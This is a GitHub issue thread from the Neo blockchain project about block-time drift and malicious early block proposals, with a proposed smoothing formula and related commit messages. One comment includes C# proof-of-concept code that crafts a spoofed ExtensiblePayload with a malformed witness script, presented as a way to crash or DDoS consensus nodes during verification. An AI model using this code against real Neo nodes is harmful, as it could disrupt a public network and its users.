-
Notifications
You must be signed in to change notification settings - Fork 1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
discussion about block time #2918
Comments
|
Good point.
This is exactly a good smoothing solution. |
Refs. #626, #1032, #1232, #1959, #2018 (this one especially), neo-project/neo-modules#799, nspcc-dev/dbft#55 (it even has a draft implementation in nspcc-dev/dbft#56). CC @igormcoelho, @vncoelho. As for the first, it's hard to separate communication delays from premature proposal. This problem does deserve some attention, but it has some administrative solution though, the bad node can be voted out. As for the second, I still think |
I� love this one, but the problem here is how does people know who should be voted out~~~ we do not really monitor the behavior of the consensus nodes. Maybe add something to statistic those data |
Sure, monitoring and some real per-node statistics is the key here (it can even be shown on governance.neo.org). |
Also you can DDOS the network with malicious script in consensus. If you know the consensus nodes IP... even better. I dont have the code atm ill have to find it. But I can tell you without a doubt it is possible and to relay to network. It has to do with the way you verify the consensus packets which allows a malicious script to be executed. And there is a way to get limited gas in the process for the vm. |
@vncoelho @igormcoelho I think consensus is your battle field, please take a look. |
I forgot the script i used, but you could spoof everything but neo/src/Neo/Network/P2P/Payloads/ExtensiblePayload.cs Lines 129 to 135 in 1ae6a13
And you can get to here to run scripts, same goes for transactions. Yes it will return false in the end. But think about it. neo/src/Neo/SmartContract/Helper.cs Line 348 in 1ae6a13
|
Must use on testnet t5 Found the code using var sb = new ScriptBuilder();
sb.Emit(OpCode.PUSHDATA1);
ExtensiblePayload payload = new()
{
Category = "DDOS",
Data = Array.Empty<byte>(),
Sender = "NcScdqRaoE6DVzvGDBAnias9GTivdWfrDf".ToScriptHash(_ns.Settings.AddressVersion),
ValidBlockStart = NativeContract.Ledger.CurrentIndex(_ns.StoreView) + 1,
ValidBlockEnd = NativeContract.Ledger.CurrentIndex(_ns.StoreView) + _ns.Settings.MaxValidUntilBlockIncrement,
};
var col = Contract.CreateSignatureContract(ECPoint.Parse("034f7ea4ca4506ef288c5d5ed61686b9f39a0bc5f7670858305e32ea504ab543f3", ECCurve.Secp256r1));
payload.Witness = new Witness()
{
InvocationScript = sb.ToArray(),
VerificationScript = col.Script,
};
payload.VerifyWitnesses(_ns.Settings, _ns.GetSnapshot(), 0_06000000L) // Crashes This is do to |
This particular issue is about block time. I'd keep it this way (although we have a number of similar ones already and probably can deduplicate a little), if there are any other problems you want to discuss, please open new ones. |
This is an interesting topic. Could you please open a new issue and let's discuss some details? I'm not sure if this kind of tx could be relayed. I thought that only senders in |
After b3c1c3b the only source of block time inaccuracy left is PrepareRequest propagation. In general it's undetermined and can vary from node to node and from round to round. But in practice it's relatively stable and can be averaged out over some number of samples. While backup node can't know when request was sent to it, it can measure what happens to its request when it's primary since healthy nodes are expected to respond immediately making request/response pretty similar to ping/pong roundtrip. This data also can't be perfect, messages can travel different ways from A to B and B to A on a P2P network, but in practice it's good enough and it's much better than having no data at all. Notice that this timer adjustment scheme uses local timer only, we trust our local clock inevitably and we don't need to mess with any view of time that other nodes have (including the one from the block header). It can be attacked by malicious peer or node delaying messages, but as we expect 2F+1 nodes to be correct one this is enough to collect proper number of responses and move on, seriously delayed response will be outdated by the time it comes then. And if any intermediary can delay messages to all nodes for arbitrary time on our P2P network we can't have any reliable timing anyway. To me it fixes as much of neo-project/neo#2918 as only possible. Signed-off-by: Roman Khimov <roman@nspcc.ru>
After b3c1c3b the only source of block time inaccuracy left is PrepareRequest propagation. In general it's undetermined and can vary from node to node and from round to round. But in practice it's relatively stable and can be averaged out over some number of samples. While backup node can't know when request was sent to it, it can measure what happens to its request when it's primary since healthy nodes are expected to respond immediately making request/response pretty similar to ping/pong roundtrip. This data also can't be perfect, messages can travel different ways from A to B and B to A on a P2P network, but in practice it's good enough and it's much better than having no data at all. Notice that this timer adjustment scheme uses local timer only, we trust our local clock inevitably and we don't need to mess with any view of time that other nodes have (including the one from the block header). It can be attacked by malicious peer or node delaying messages, but as we expect 2F+1 nodes to be correct one this is enough to collect proper number of responses and move on, seriously delayed response will be outdated by the time it comes then. And if any intermediary can delay messages to all nodes for arbitrary time on our P2P network we can't have any reliable timing anyway. To me it fixes as much of neo-project/neo#2918 as only possible. Signed-off-by: Roman Khimov <roman@nspcc.ru>
this is not an urgent problem, but it is easy to fix without introducing forks.
any malicious consensus node is able to propose its block earlier (any time from 0 to 15s)
the 1/3 fault nodes is able to speed up block generation by 33%, thereby increasing the annual supply of GAS by 33%
although neo’s expected block time is 15 seconds, it actually takes 16 to 17 seconds sometimes even more.
essentially it is because neo consensus nodes propose the next block 15s after the current block and the negotiation of consensus nodes and transaction execution take some extra time
it is suggested to calculate the expected block proposing time as(N+1) * 15 - BLOCKTIME[CURRENT] + BLOCKTIME[CURRENT - N]
whereN
is an positive integer (i.e1
,8
,64
, ...) andBLOCKTIME[BLOCKINDEX]
is the block time at block heightBLOCKINDEX
The text was updated successfully, but these errors were encountered: